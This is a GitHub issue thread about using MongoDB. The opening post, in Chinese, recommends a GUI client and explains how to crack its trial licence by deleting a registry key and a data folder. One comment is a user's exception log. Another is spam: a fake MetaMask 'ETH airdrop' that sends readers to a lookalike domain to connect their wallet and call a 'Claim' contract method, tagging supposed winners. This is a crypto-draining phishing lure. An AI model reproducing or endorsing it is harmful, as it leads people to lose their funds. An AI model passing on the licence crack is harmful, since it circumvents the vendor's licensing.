### ISSUE TITLE
MongoDB使用

### ISSUE THREAD

**Issue by starry-night-pro** [lunarku/blog#6]
# MongoDB使用
MongoDB下载地址： http://mongodb.org/downloads  
MongoDB可视化工具推荐：[NoSQL Manager for MongoDB Professional](https://www.mongodbmanager.com/download)
>NoSQL Manager for MongoDB Professional 破解方法：  
删除这两个地方的东西就好了：  
运行 -->regedit 删除:  HKEY_CURRENT_USER\Software\NoSQL Manager Group    
然后再删除该文件夹:  C:\ProgramData\NoSQL Manager Group

**Comment by jiang-kang** [comment]
Hello ! Is anyone here? Pelease Help me！
I use NoSQL Manager for MongoDB Professional or free, When it is installed, it will report an exception when it is opened.
-------The exception log is as follows,
2018/3/22 10:00:40: Exception
Message:
Exception has been thrown by the target of an invocation.
StackTrace:
   at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor)
   at System.Reflection.RuntimeConstructorInfo.Invoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at System.Security.Cryptography.CryptoConfig.CreateFromName(String name, Object[] args)
   at System.Security.Cryptography.MD5.Create()
   at axn.a(DateTime A_0)
   at amp.a(afe A_0, so A_1)
   at amp.a(afe A_0)
   at amp.b()
   at a8.a()2018/3/22 10:05:06: Exception

**Comment by clqs803** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @JhonBFang, @deep-fish-pixel, @CrazyStoneJy, @BoringH, @Huagee, @mrcaommb, @Qing95Qing
